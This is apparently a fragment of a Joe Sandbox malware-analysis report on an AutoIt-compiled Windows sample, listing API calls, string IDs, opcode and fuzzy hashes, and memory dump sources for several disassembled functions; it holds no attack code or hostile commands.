• Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
• Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
• Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
• Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
APIs
• SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• wsprintfW.USER32 ref: 0045612A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend_mallocwsprintf
• String ID: %d/%02d/%02d
• API String ID: 1262938277-328681919
• Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
• Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
• Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
• Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
APIs
• InternetCloseHandle.WININET(?), ref: 00442663
• InternetCloseHandle.WININET ref: 00442668
  • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: CloseHandleInternet$ObjectSingleWait
• String ID: aeB
• API String ID: 857135153-906807131
• Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
• Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
• Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
• PostMessageW.USER32(00000000), ref: 00441C05
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                • API String ID: 529655941-2988720461
                                                                                                                                                                                                                • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
  • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
• Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
• Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
  • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
• Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
• Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D